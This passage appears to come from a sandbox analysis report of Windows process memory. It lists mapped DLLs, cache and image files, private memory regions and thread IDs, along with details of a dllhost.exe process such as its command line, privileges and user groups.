"wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3172 start_va = 0x6d30000 end_va = 0x6daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d30000" filename = "" Region: id = 3173 start_va = 0x6db0000 end_va = 0x6db1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 3174 start_va = 0x6dc0000 end_va = 0x6ebffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 3175 start_va = 0x7fffada10000 end_va = 0x7fffadab8fff monitored = 0 entry_point = 0x7fffada39010 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 3176 start_va = 0x6ec0000 end_va = 0x6f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ec0000" filename = "" Region: id = 3177 start_va = 0x6f40000 end_va = 0x703ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f40000" filename = "" Region: id = 3178 start_va = 0x6f40000 end_va = 0x6fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f40000" filename = "" Region: id = 3179 start_va = 0x7030000 end_va = 0x703ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007030000" filename = "" Region: id = 3180 start_va = 0x6f40000 end_va = 0x6f41fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 3181 start_va = 0x6f50000 end_va = 0x704ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 3182 start_va = 0x7050000 end_va = 0x70cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007050000" filename = "" Region: id = 3184 start_va = 0x7fffab340000 end_va = 0x7fffab380fff monitored = 0 entry_point = 0x7fffab344840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 3198 start_va = 0x7fffb0a60000 end_va = 0x7fffb0a6bfff monitored = 0 entry_point = 0x7fffb0a627e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3199 start_va = 0x7fffafd90000 end_va = 0x7fffafe06fff monitored = 0 entry_point = 0x7fffafd92af0 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 3200 start_va = 0x7fffb40b0000 end_va = 0x7fffb411afff monitored = 0 entry_point = 0x7fffb40c90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3201 start_va = 0x5270000 end_va = 0x52a2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 3202 start_va = 0x5270000 end_va = 0x5761fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005270000" filename = "" Region: id = 3203 start_va = 0x70d0000 end_va = 0x70d8fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "wxe_5du7wv.jpg" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\WXe_5du7wV.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wxe_5du7wv.jpg") Region: id = 3249 start_va = 0x70d0000 end_va = 0x714ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000070d0000" filename = "" Region: id = 3250 start_va = 0x7fffad630000 end_va = 0x7fffad709fff monitored = 0 entry_point = 0x7fffad663c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 3251 start_va = 0x7fffab390000 end_va = 0x7fffab457fff monitored = 0 entry_point = 0x7fffab3d13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3253 start_va = 0x7fffadc00000 end_va = 0x7fffadc85fff monitored = 0 entry_point = 0x7fffadc21e10 region_type = mapped_file name = "notificationcontroller.dll" filename = "\\Windows\\System32\\NotificationController.dll" (normalized: "c:\\windows\\system32\\notificationcontroller.dll") Region: id = 3254 start_va = 0x7fffa91c0000 end_va = 0x7fffa920afff monitored = 0 entry_point = 0x7fffa91d7b70 region_type = mapped_file name = "veeventdispatcher.dll" filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll") Region: id = 3259 start_va = 0x7150000 end_va = 0x718ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007150000" filename = "" Region: id = 3260 start_va = 0x7190000 end_va = 0x71a0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "lskouqoyoyuqcb80ssri.png" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\DxkQb1KQFTn\\LSkouqOYOyuQcb80sSri.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\dxkqb1kqftn\\lskouqoyoyuqcb80ssri.png") Region: id = 3322 start_va = 0x7190000 end_va = 0x720ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007190000" filename = "" Region: id = 3329 start_va = 0x27f0000 end_va = 0x2838fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Region: id = 3330 start_va = 0x7190000 end_va = 0x9511fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "appdb.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Notifications\\appdb.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\notifications\\appdb.dat") Region: id = 3331 start_va = 0x7fffadbd0000 end_va = 0x7fffadbfafff monitored = 0 entry_point = 0x7fffadbd4240 region_type = mapped_file name = "abovelockapphost.dll" filename = "\\Windows\\System32\\AboveLockAppHost.dll" (normalized: "c:\\windows\\system32\\abovelockapphost.dll") Region: id = 3332 start_va = 0x9520000 end_va = 0x959ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009520000" filename = "" Region: id = 3333 start_va = 0x7fffad4b0000 end_va = 0x7fffad4d5fff monitored = 0 entry_point = 0x7fffad4c5cb0 region_type = mapped_file name = "npsm.dll" filename = "\\Windows\\System32\\NPSM.dll" (normalized: "c:\\windows\\system32\\npsm.dll") Region: id = 3334 start_va = 0x2840000 end_va = 0x2840fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fileextension.targetsize-48.png" filename = "\\Program Files\\WindowsApps\\Microsoft.ZuneVideo_3.6.13251.0_x64__8wekyb3d8bbwe\\Assets\\FileExtension.targetsize-48.png" (normalized: "c:\\program files\\windowsapps\\microsoft.zunevideo_3.6.13251.0_x64__8wekyb3d8bbwe\\assets\\fileextension.targetsize-48.png") Thread: id = 234 os_tid = 0x770 Thread: id = 235 os_tid = 0x768 Thread: id = 236 os_tid = 0x738 Thread: id = 237 os_tid = 0x720 Thread: id = 238 os_tid = 0x71c Thread: id = 239 os_tid = 0x718 Thread: id = 240 os_tid = 0x710 Thread: id = 241 os_tid = 0x714 Thread: id = 242 os_tid = 0x70c Thread: id = 243 os_tid = 0x708 Thread: id = 244 os_tid = 0x6f8 Thread: id = 245 os_tid = 0x6f4 Thread: id = 246 os_tid = 0x6f0 Thread: id = 247 os_tid = 0x6b8 Thread: id = 248 os_tid = 0x6b4 Thread: id = 251 os_tid = 0x7a0 Thread: id = 252 os_tid = 0x7a8 Thread: id = 253 os_tid = 0x7bc Thread: id = 254 os_tid = 0x7c0 Thread: id = 255 os_tid = 0x7c4 Thread: id = 257 os_tid = 0x7c8 Thread: id = 258 os_tid = 0x7cc Thread: id = 259 os_tid = 0x7dc Thread: id = 260 os_tid = 0x7e0 Thread: id = 261 os_tid = 0x7e4 Thread: id = 262 os_tid = 0x7ec Thread: id = 275 os_tid = 0x324 Thread: id = 287 os_tid = 0x394 Thread: id = 288 os_tid = 0x148 Process: id = "16" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x27427000" os_pid = "0x7fc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "15" os_parent_pid = "0x268" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f256" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3261 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3262 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3263 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3264 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3265 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 3266 start_va = 0x160000 end_va = 0x161fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3267 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 3268 start_va = 0x180000 end_va = 0x186fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 3269 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 3270 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3271 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3272 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 3273 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3274 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3275 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3276 start_va = 0x490000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 3277 start_va = 0x590000 end_va = 0x64dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3278 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 3279 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3280 start_va = 0x810000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 3281 start_va = 0x910000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 3282 start_va = 0xa10000 end_va = 0xb0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 3283 start_va = 0xb10000 end_va = 0xc0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 3284 start_va = 0xc10000 end_va = 0xd97fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c10000" filename = "" Region: id = 3285 start_va = 0xda0000 end_va = 0xf20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000da0000" filename = "" Region: id = 3286 start_va = 0xf30000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f30000" filename = "" Region: id = 3287 start_va = 0x2430000 end_va = 0x252ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 3288 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3289 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 3290 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 3291 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 3292 start_va = 0x7ff6a5880000 end_va = 0x7ff6a5886fff monitored = 0 entry_point = 0x7ff6a5881570 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 3293 start_va = 0x7fffa58e0000 end_va = 0x7fffa592cfff monitored = 0 entry_point = 0x7fffa58f7de0 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 3294 start_va = 0x7fffa8270000 end_va = 0x7fffa84e3fff monitored = 0 entry_point = 0x7fffa82e0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 3295 start_va = 0x7fffafae0000 end_va = 0x7fffafc65fff monitored = 0 entry_point = 0x7fffafb2d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3296 start_va = 0x7fffaffd0000 end_va = 0x7fffb0065fff monitored = 0 entry_point = 0x7fffafff5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3297 start_va = 0x7fffb16d0000 end_va = 0x7fffb16defff monitored = 0 entry_point = 0x7fffb16d3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3298 start_va = 0x7fffb16e0000 end_va = 0x7fffb1794fff monitored = 0 entry_point = 0x7fffb17222e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3299 start_va = 0x7fffb1ab0000 end_va = 0x7fffb1b19fff monitored = 0 entry_point = 0x7fffb1ae6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3300 start_va = 0x7fffb1b20000 end_va = 0x7fffb1d07fff monitored = 0 entry_point = 0x7fffb1b4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3301 start_va = 0x7fffb2460000 end_va = 0x7fffb2520fff monitored = 0 entry_point = 0x7fffb2480da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3302 start_va = 0x7fffb3a90000 end_va = 0x7fffb3b2cfff monitored = 0 entry_point = 0x7fffb3a978a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3303 start_va = 0x7fffb3b40000 end_va = 0x7fffb3cc5fff monitored = 0 entry_point = 0x7fffb3b8ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3304 start_va = 0x7fffb3e50000 end_va = 0x7fffb3ef6fff monitored = 0 entry_point = 0x7fffb3e5b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3305 start_va = 0x7fffb3f60000 end_va = 0x7fffb3f9afff monitored = 0 entry_point = 0x7fffb3f612f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3306 start_va = 0x7fffb3fa0000 end_va = 0x7fffb404cfff monitored = 0 entry_point = 0x7fffb3fb81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3307 start_va = 0x7fffb4050000 end_va = 0x7fffb40aafff monitored = 0 entry_point = 0x7fffb40638b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3308 start_va = 0x7fffb42d0000 end_va = 0x7fffb43ebfff monitored = 0 entry_point = 0x7fffb43102b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3309 start_va = 0x7fffb4700000 end_va = 0x7fffb4855fff monitored = 0 entry_point = 0x7fffb470a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3310 start_va = 0x7fffb4860000 end_va = 0x7fffb4adcfff monitored = 0 entry_point = 0x7fffb4934970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3311 start_va = 0x7fffb5030000 end_va = 0x7fffb51f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3312 start_va = 0x7fffaa4c0000 end_va = 0x7fffaa52cfff monitored = 0 entry_point = 0x7fffaa4cd750 region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 3313 start_va = 0x7fffae9b0000 end_va = 0x7fffaeb60fff monitored = 0 entry_point = 0x7fffaea461a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 3314 start_va = 0x7fffaed20000 end_va = 0x7fffaf1b2fff monitored = 0 entry_point = 0x7fffaed2f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Thread: id = 278 os_tid = 0x230 Thread: id = 279 os_tid = 0x1dc Thread: id = 280 os_tid = 0x1cc Thread: id = 281 os_tid = 0x754 Thread: id = 282 os_tid = 0x464 Thread: id = 283 os_tid = 0x164 Thread: id = 284 os_tid = 0x408